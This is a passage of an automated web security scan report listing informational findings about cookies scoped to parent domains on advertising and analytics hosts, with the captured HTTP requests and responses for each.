The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/bh.gif?n=826&g=20&a=798&s=$t&l=1&t=i&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 88
Content-Type: image/gif
Set-Cookie: ZFFAbh=845B826,20|798_845#365;expires=Tue, 24 Apr 2012 15:14:03 GMT;domain=.zedo.com;path=/;
ETag: "1b633f4-7054-4942082502f40"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 1492157159
Cache-Control: max-age=29594
Expires: Mon, 25 Apr 2011 23:27:18 GMT
Date: Mon, 25 Apr 2011 15:14:04 GMT
Connection: close

GIF89a.............!.......,...........D..;

GIF89a.............!.......,...........D..;
16.25. http://fc.ef.d4.cf.bd.a1.top.mail.ru/counter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fc.ef.d4.cf.bd.a1.top.mail.ru
Path:   /counter

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=1963260;js=13;r=;j=true;s=1920*1200;d=16;rand=0.3155316608026624 HTTP/1.1
Host: fc.ef.d4.cf.bd.a1.top.mail.ru
Proxy-Connection: keep-alive
Referer: http://odnoklassniki.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:30:07 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2Tir3I2W_cms; path=/; expires=Tue, 26 Jul 2011 14:30:07 GMT; domain=.mail.ru
Set-Cookie: FTID=0; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:01 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 43
Connection: close

GIF89a.............!.......,...........D..;
16.26. http://goods.adnectar.com/analytics/get_avia_js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://goods.adnectar.com
Path:   /analytics/get_avia_js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /analytics/get_avia_js?api_version=3.0.0&site_key=a9aa425c93ef5dff380c&avia_version=0.8.16 HTTP/1.1
Host: goods.adnectar.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:24 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Status: 200
ETag: "643abe138f06b030650a5c28ca19bdb4"
X-Runtime: 1
Content-Length: 6324
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: adnectar_id=PObkQ021hYBNKXjmCLweAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"

var exceptionmessage = null;
try {
var avia_already_defined = false;
if (typeof(_an_tracker) !== 'undefined') {
avia_already_defined = true;
}

// First, define JS versions of methods not
...[SNIP]...
16.27. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ab?enc=4XoUrkfhFEDhehSuR-EUQAAAAMDMzABA4XoUrkfhFEDhehSuR-EUQICU8FEmC1Z8SsYda6b2ziU-g7VNAAAAAIAeAQC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gA3CRQE4ggBAgUCAAMAAAAAHSOBcgAAAAA.&tt_code=livejournal.com&udj=uf%28%27a%27%2C+9797%2C+1303741246%29%3Buf%28%27c%27%2C+47580%2C+1303741246%29%3Buf%28%27r%27%2C+173255%2C+1303741246%29%3Bppv%288991%2C+%278959360767911564416%27%2C+1303741246%2C+1303784446%2C+47580%2C+25553%29%3B&cnd=!wA_Htwjc8wIQx8kKGAAg0ccBKJQIMQAAALxH4RRAQgoIABAAGAAgASgBQgsIn0YQABgAIAMoAUILCJ9GEAAYACACKAFIAVAAWLcSYABolgU.&referrer=http://www.livejournal.com/&pp=TbWDPgACKZsK5XeQflcean0rg75a9lJ4uX93wQ&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBJSjBPoO1TZvTCJDvlQfqvNzyB9fq-NMBl6GU7BiXn6ezIQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00NDU2MTgyMTM1OTU2OTc0oAHD8v3sA7IBE3d3dy5saXZlam91cm5hbC5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j^mpJE<$kSEt*JykUZhXB8XJ0oede![)AEsIM^tT@?LGc[=4bz:`?WTNk8atX?)M4!*Z#:qn:#h

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j]yUTqG`bWR!yb-mQiJH(KxkF9(^4Z[?Rks(K9>2.t`@]S#.Pi-s@M.gKfz]>NjwEsq(Q8!6Gfbik=DN; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 25 Apr 2011 14:20:47 GMT
Content-Length: 1454

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bad56300\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/AAAAAAAAFEAAAAAAAAAUQAAA
...[SNIP]...
16.28. http://ib.adnxs.com/pxj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /pxj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1303072666-9018543%7cMUID%3db506c07761d7465d924574124e3c14df%7cTOptOut%3d0%7cEANON%3dA%253d0%2526E%253dFFF%2526W%253d1%22); HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j^mpJE<$kSEt*JykUZhXB8XJ0oede![)AEsIM^tT@?LGc[=4bz:`?WTNk8atX?)M4!*Z#:qn:#h

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:23:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:23:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:23:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j^mpJE<$kSEt*JykUZhXB8XJ0oede![)AEsIM^tT@?LGc[=4bz:`?WTNk8atX?)M4!*Z#:qn:#h; path=/; expires=Sun, 24-Jul-2011 14:23:47 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Mon, 25 Apr 2011 14:23:47 GMT

GIF89a.............!.......,........@..L..;
16.29. http://id.google.com/verify/EAAAADz5CbNokYbOxZux8yNUhyk.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAADz5CbNokYbOxZux8yNUhyk.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAADz5CbNokYbOxZux8yNUhyk.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Clone+Guard
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=gSEJj72S3eACslX3B1ZbRrFspRphJXzlq8rPWFoN-g=FjAd29KQBIGtSjDM; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=46=BvU5jnCv0fdJQ_qVsenRQdfGNOnbO8CTu0J_4cAZZA=ziV4jE_MMxlMlN22; expires=Tue, 25-Oct-2011 18:58:23 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 25 Apr 2011 18:58:23 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;
16.30. http://id.google.com/verify/EAAAAP8sqKb20XMZzt0hJR6mFcY.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAP8sqKb20XMZzt0hJR6mFcY.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAP8sqKb20XMZzt0hJR6mFcY.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Kayako+SupportSuite
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=BvU5jnCv0fdJQ_qVsenRQdfGNOnbO8CTu0J_4cAZZA=ziV4jE_MMxlMlN22; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 200 OK
Set-Cookie: NID=46=Arvh7RneopiyMp_J1gBnwK6dUPjUg-iLEhhvnp_D5jiL5VKX_NLiPiRWmQSBdMwimsMifg4dxWitIEE9yICSOAtkSTBLprF7rndg9WUki2R-eKxI3lr2JBjCshmP3gTT; expires=Tue, 25-Oct-2011 19:14:31 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 25 Apr 2011 19:14:31 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;
16.31. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=ab470e57-8d67-4a28-b9b1-aaf3331f5214 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250&8144=734251; domain=.interclick.com; expires=Sun, 25-Apr-2021 14:43:44 GMT; path=/
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 25 Apr 2011 14:43:44 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
16.32. http://l.azjmp.com/f.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.azjmp.com
Path:   /f.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /f.php?o=12743&e= HTTP/1.1
Host: l.azjmp.com
Proxy-Connection: keep-alive
Referer: http://www.reputationchanger.com/scheduled.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 16:06:11 GMT
Content-Type: text/html
Connection: close
Set-Cookie: OAID=025BED7B787B6DB50E0FAF2093A45A3D; Expires=Tue, 24 Apr 2012 16:06:11 GMT; Max-Age=31536000; Domain=azjmp.com; Path=/
P3P: policyref="http://azjmp.com/w3c/policy.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Content-Length: 39

<html><head></head><body></body></html>
16.33. http://m.adnxs.com/msftcookiehandler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3dB506C07761D7465D924574124E3C14DF HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j]yUTqG`bWR!yb-mQiJH(KxkF9(^4Z[?Rks(K9>2.t`@]S#.Pi-s@M.gKfz]>NjwEsq(Q8!6Gfbik=DN

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:37:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:37:36 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Mon, 25 Apr 2011 14:37:36 GMT

GIF89a.............!.......,........@..L..;
16.34. http://map.media6degrees.com/orbserv/aopix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /orbserv/aopix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/aopix?pixId=6387&pcv=56&cb=2534812616&topHref=http%3A%2F%2Fwww.livejournal.com%2F HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2ljtllp0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=012020h1ljtllpxzt1tzu; clid=2ljtllp01170xrd52zkwjuxh0cf4p00736010i01407; rdrlst=40315xylk60qe0000000136010znmlk346200000002360110poljyxb4000000043601; sglst=2020s0t7ljyxb4073fa00436010i01404ag3ljyxb4073fa00436010i01404; vstcnt=417k010r014uzg6118e1002

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh0e4d100837010i02408; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Set-Cookie: rdrlst=40415xylk60qe00000002370113bolk7pyq0000000137010znmlk346200000003370110poljyxb4000000053701; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Set-Cookie: sglst=2020s0t7ljyxb408snm00537010i02405ag3ljyxb408snm00537010i02405; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Set-Cookie: vstcnt=417k010r014uzg6118e1002; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Location: http://ad.afy11.net/ad?mode=7&publisher_dsp_id=5&external_user_id=xrd52zkwjuxh&custom_mon=0
Content-Length: 0
Date: Mon, 25 Apr 2011 14:37:38 GMT

16.35. http://mc.yandex.ru/watch/57617  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mc.yandex.ru
Path:   /watch/57617

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /watch/57617?rn=540876&cnt-class=1&page-ref=&page-url=http%3A%2F%2Fwebalta.ru%2F&browser-info=j:1:s:1920x1200x16:f:10.2.154:w:1125x981:z:-300:i:20110425092015:l:4.0.60129.0:en:utf-8:v:911:c:1:t:%D0%9F%D0%BE%D0%B8%D1%81%D0%BA%D0%BE%D0%B2%D0%B0%D1%8F%20%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0%20Webalta&site-info=%7B%7D&wmode=3 HTTP/1.1
Host: mc.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:20:05 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:05 GMT
Expires: Mon, 25 Apr 2011 14:20:05 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Location: http://mc.yandex.ru/watch/57617/1?rn=540876&cnt-class=1&page-ref=&page-url=http%3A%2F%2Fwebalta.ru%2F&browser-info=j:1:s:1920x1200x16:f:10.2.154:w:1125x981:z:-300:i:20110425092015:l:4.0.60129.0:en:utf-8:v:911:c:1:t:%D0%9F%D0%BE%D0%B8%D1%81%D0%BA%D0%BE%D0%B2%D0%B0%D1%8F%20%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0%20Webalta&site-info=%7B%7D&wmode=3
Set-Cookie: yandexuid=1458985311303741205; domain=.yandex.ru; path=/; expires=Thu, 22-Apr-2021 14:20:05 GMT
Set-Cookie: yabs-sid=377248491303741205; path=/
Content-Length: 0

16.36. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

